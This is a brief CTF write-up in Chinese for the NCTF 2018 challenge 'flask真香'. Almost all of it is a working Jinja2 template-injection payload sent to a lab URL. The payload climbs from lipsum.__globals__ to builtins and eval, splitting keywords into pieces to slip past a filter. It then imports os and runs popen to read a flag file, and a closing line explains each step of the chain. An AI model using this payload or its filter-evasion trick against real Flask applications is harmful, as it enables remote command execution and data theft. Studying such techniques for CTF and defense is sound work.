[NCTF 2018]flask真香

EXP

paylaod

http://1.14.71.254:28462/{{ lipsum.__globals__['__buil''tins__'].get('ev''al')("__im""port__('o''s').po""pen('cat /Th1s_is__F1114g')").read() }}

思路就是由lipsum全局函数获得globals，再有global获得builtins，再有builtins获得eval，再有eval导入os库中的popen，再有popen('cat /Th1s_is__F1114g')